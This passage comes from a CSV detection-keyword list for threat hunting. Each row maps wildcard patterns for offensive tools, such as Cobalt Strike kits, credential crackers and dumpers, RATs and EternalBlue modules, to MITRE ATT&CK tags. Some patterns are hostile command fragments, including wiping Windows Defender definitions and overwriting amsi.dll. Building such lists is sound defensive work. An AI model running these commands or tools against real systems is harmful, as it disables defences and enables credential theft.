hosting offensive tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/mogwailabs,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*mojo.5688.8052.183894939787088877##*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,pipe name,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*mojo.5688.8052.35780273329370473##*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,pipe name,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*mojo_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*monero2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*money2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*mongodb2john.js*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Monkey Island v*_windows.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,0,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*monkey*tunnel.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*monkey\infection_monkey*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*monkey_island.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*monkey32.exe *,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,0,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*monkey64.exe *,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,0,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*monkey-linux-32*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*monkey-linux-64*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*monkey-windows-32.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*monkey-windows-64.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*monoxgas/sRDI*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,1,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z -*moonD4rk/HackBrowserData*,offensive_tool_keyword,cobaltstrike,C# binary with embeded golang hack-browser-data,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData,1,1,N/A,10,10,84,15,2021-12-09T18:58:27Z,2020-12-06T12:28:47Z -*MooseDojo*,offensive_tool_keyword,Github Username,github repo that was hosting exploitation tools. may be used by other exploitation tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/MooseDojo,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*morphHTA*,offensive_tool_keyword,morphHTA,morphHTA - Morphing Cobalt Strikes evil.HTA payload generator,T1059.007 - T1027.002 - T1564.001 - T1547.001,TA0002 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/vysecurity/morphHTA,1,1,N/A,N/A,6,503,142,2023-04-14T19:15:57Z,2017-02-24T11:27:00Z -*mortar-main.zip*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,1,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*mosquitto2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Mount-VolumeShadowCopy*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*mousejack*,offensive_tool_keyword,mousejack,MouseJack device discovery and research tools,T1179 - T1059 - T1065 - T1057,TA0011 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/BastilleResearch/mousejack,1,1,N/A,N/A,10,1203,255,2017-12-19T10:16:25Z,2016-02-23T14:19:38Z -*mouseshaker.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*movefile64.exe /nobanner *.dll C:\Windows\System32\amsi.dll*,greyware_tool_keyword,movefile64.exe,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin,1,0,N/A,10,8,N/A,N/A,N/A,N/A -*MoveKit-master.zip*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*move-msbuild * http move.csproj*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*move-pre-custom-file *.exe *,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Lateral Movement,T1021.002 - T1021.006 - T1021.004,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/MoveKit,1,1,N/A,10,7,615,114,2020-02-21T20:23:45Z,2020-01-24T22:19:16Z -*movfuscator*,offensive_tool_keyword,movfuscator,The M/o/Vfuscator (short 'o. sounds like mobfuscator) compiles programs into mov instructions. and only mov instructions. Arithmetic. comparisons. jumps. function calls. and everything else a program needs are all performed through mov operations. there is no self-modifying code. no transport-triggered calculation. and no other form of non-mov cheating,T1057 - T1027 - T1059,TA0002 - TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/xoreaxeaxeax/movfuscator,1,0,N/A,N/A,10,8639,392,2023-03-04T21:15:10Z,2015-06-16T01:49:40Z -*Mozilla/5.0 (*-bit) dnstwist*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,1,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -*mozilla2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*mozlz4-win32.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*mpcaainmfjjigeicjnlkdfajbioopjko*,greyware_tool_keyword,VPN Unlimited Free,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*MpCmdRun.exe -RemoveDefinitions -All*,greyware_tool_keyword,MpCmdRun,Wipe currently stored definitions,T1562.004 - T1070.004,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*MpCmdRun.exe* -disable*,greyware_tool_keyword,MpCmdRun,Defense evasion technique disable windows defender,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*MpCmdRun.exe* -RemoveDefinitions -All*,offensive_tool_keyword,MpCmdRun,Removing all the signature from windows defender - used by a metasploit module,T1562.001,TA0040,N/A,N/A,Defense Evasion,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*mpgn/BackupOperatorToDA*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*mqtt_check.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*mr.un1k0d3r@gmail.com*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*Mr-B0b/SpaceRunner*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,1,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*Mr-Cyb3rgh0st/Excel-Exploit*,offensive_tool_keyword,Excel-Exploit,MacroExploit use in excel sheet,T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main,1,1,N/A,N/A,1,21,4,2023-06-12T11:47:52Z,2023-06-12T11:46:53Z -*mrd0x/BITB*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,1,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z -*mremoteng_decrypt.py*,offensive_tool_keyword,mRemoteNG-Decrypt,Python script to decrypt passwords stored by mRemoteNG,T1589 T1003 T1563 T1552 T1098 T1021,N/A,N/A,N/A,Credential Access,https://github.com/haseebT/mRemoteNG-Decrypt,1,1,N/A,N/A,2,111,39,2023-07-06T16:15:20Z,2019-05-27T05:25:57Z -*mRemoteNG-local.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*MrEmpy/Reaper*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,1,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*Mr-Un1k0d3r*,offensive_tool_keyword,Github Username,github username Mostly Red Team tools for penetration testing. Twitter - @MrUn1k0d3r,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Mr-Un1k0d3r,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ms_teams_exports_usernev_dll.txt*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -*ms04_007_killbill.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ms14-068.py -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ms14-068.py -u*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ms14-068_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ms17_010_eternalblue*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ms17_010_eternalblue.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ms17_010_psexec*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ms17_010_psexec.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*MS17-010*,offensive_tool_keyword,POC,MS17-010 poc github repos,T1204.002,TA0002,N/A,N/A,Exploitation tools,https://github.com/worawit/MS17-010,1,0,N/A,N/A,10,2048,1127,2023-06-20T08:27:19Z,2017-06-19T16:47:31Z -*ms17-010_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*MSBuild.exe NetLoader.xml*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*MSBuildShell*,offensive_tool_keyword,MSBuildShell,a Powershell Host running within MSBuild.exe This code lets you Bypass Application Whitelisting and Powershell.exe restrictions and gives you a shell that almost looks and feels like a normal Powershell session (Get-Credential. PSSessions -> Works. Tab Completion -> Unfortunately not). It will also bypass the Antimalware Scan Interface (AMSI). which provides enhanced malware protection for Powershell scripts,T1027 - T1086 - T1059 - T1064 - T1089,TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Cn33liz/MSBuildShell,1,1,N/A,N/A,3,274,81,2019-08-02T06:46:52Z,2016-11-11T18:52:38Z -*MScholtes/PS2EXE*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*msedge* --headless * --dump-dom http*,greyware_tool_keyword,chromium,Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense Evasion,https://redcanary.com/blog/intelligence-insights-june-2023/,1,0,N/A,4,5,N/A,N/A,N/A,N/A -*msedge* --headless --disable-gpu --remote-debugging-port=*,greyware_tool_keyword,chromium,Headless Chromium allows running Chromium in a headless/server environment - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense Evasion,https://www.splunk.com/en_us/blog/security/mockbin-and-the-art-of-deception-tracing-adversaries-going-headless-and-mocking-apis.html,1,1,N/A,5,10,N/A,N/A,N/A,N/A -"*msedge.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",greyware_tool_keyword,chromium,The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.,T1136.001 - T1176 - T1059.007,TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://www.mandiant.com/resources/blog/lnk-between-browsers,1,0,risk of false positives,7,10,N/A,N/A,N/A,N/A -*msf_api_doc.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msf_cve_extracter.py*,offensive_tool_keyword,Xerror,fully automated pentesting tool,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Chudry/Xerror,1,1,N/A,N/A,5,458,106,2022-12-08T04:33:03Z,2019-08-16T21:20:52Z -*msf_exec.py*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 